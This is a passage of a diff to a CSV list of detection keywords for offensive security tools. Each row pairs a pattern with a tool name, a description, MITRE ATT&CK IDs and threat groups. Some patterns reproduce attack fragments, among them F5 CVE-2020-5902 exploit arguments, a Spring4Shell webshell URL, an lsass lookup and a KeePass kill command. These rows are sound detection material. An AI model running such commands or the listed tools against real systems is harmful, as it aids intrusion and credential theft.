T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" -"*syswhispersv2_x86*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*syswhispersv2_x86*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*-t * -x lfr -f /etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z" "*-t * -x rce -a list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z" -"*T0XlCv1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*T0XlCv1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*t3l3machus/BabelStrike*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" "*t3l3machus/Synergy-httpx*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*TailorScan.exe *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" @@ -17553,13 +17736,14 @@ "*target/tomcatwar.jsp?pwd=j&cmd=*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*targetedKerberoast.git*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" "*targetedKerberoast.py*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" -"*targetedkerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*targetedkerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*targetedkerberoast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*targetedkerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*targetedkerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*targetedkerberoast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*targetedKerberoast-main*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" "*targetver.h*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*tarunkant/Gopherus*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*tas389.ps1*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*taskkill /F /T /IM keepass.exe /FI*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*tasklist /fi *Imagename eq lsass.exe* | find *lsass*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*TaskShell.exe * -b *.exe*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" "*TaskShell.exe * -s *SYSTEM*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" @@ -17567,9 +17751,9 @@ "*tastypepperoni/RunAsWinTcb*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*tcpClient.connectTCP(*127.0.0.1*1337*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" "*tcpreplay*","offensive_tool_keyword","tcpreplay","Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.","T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://tcpreplay.appneta.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*tcpshell.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*tdragon6/Supershell*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*teamserver* no_evasion.profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*tcpshell.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*tdragon6/Supershell*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*teamserver* no_evasion.profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "*teamServer*ZoomAPI.py*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*TeamServer.C2Profiles*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer.exe *github.com*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" @@ -17577,56 +17761,56 @@ "*TeamServer/Filters/InjectionFilters*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer/Pivots/*.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*TeamServer\TeamServer.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*TeamsPhisher.git*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*teamsphisher.log*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*teamsphisher.py*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*TeamsPhisher-main.zip*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*teamstracker-main*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*teamviewer_passwords.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*teamviewer_passwords.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*TeamsPhisher.git*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamsphisher.log*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamsphisher.py*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*TeamsPhisher-main.zip*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamstracker-main*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*teamviewer_passwords.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*teamviewer_passwords.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*techspence/ScriptSentry*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" 